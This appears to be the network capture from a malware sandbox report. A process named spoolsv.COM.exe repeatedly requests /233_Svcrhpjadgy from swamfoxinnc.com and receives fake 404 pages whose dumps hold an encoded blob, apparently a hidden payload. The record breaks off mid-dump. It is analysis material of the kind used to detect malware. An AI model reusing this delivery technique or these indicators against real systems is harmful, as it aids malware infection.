                                                                            Dec 23, 2024 07:39:39.590796947 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:39.702958107 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:39.702991009 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:39.703152895 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:39.703171968 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:39.703217030 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:39.786505938 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:39.786561966 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:39.786585093 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:39.786600113 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:39.786639929 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:39.786639929 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.033488989 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.033607960 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.033646107 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.033684969 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.034110069 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.034130096 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.034164906 CET50031443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.034169912 CET44350031176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.232165098 CET50041443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.232213020 CET44350041176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.232306004 CET50041443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.232877016 CET50041443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.232979059 CET44350041176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.234147072 CET50041443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.357671022 CET50042443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.357721090 CET44350042176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:40.357829094 CET50042443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.358290911 CET50042443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:39:40.358305931 CET44350042176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:41.818043947 CET44350042176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:39:41.818166018 CET50042443192.168.2.10176.123.5.143
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 23, 2024 07:37:38.153759003 CET6126153192.168.2.101.1.1.1
                                                                            Dec 23, 2024 07:37:38.470036030 CET53612611.1.1.1192.168.2.10
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 23, 2024 07:37:38.153759003 CET192.168.2.101.1.1.10x5431Standard query (0)swamfoxinnc.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 23, 2024 07:37:38.470036030 CET1.1.1.1192.168.2.100x5431No error (0)swamfoxinnc.com176.123.5.143A (IP address)IN (0x0001)false
                                                                            • swamfoxinnc.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.1049701176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:37:40 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:37:41 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:37:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:37:41 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:37:41 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:37:41 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:37:41 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.1049704176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:37:43 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:37:45 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:37:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:37:45 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:37:45 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:37:45 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:37:45 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1049711176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:37:47 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:37:48 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:37:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:37:48 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:37:48 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:37:48 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:37:48 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1049723176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:37:50 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:37:52 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:37:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:37:52 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:37:52 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
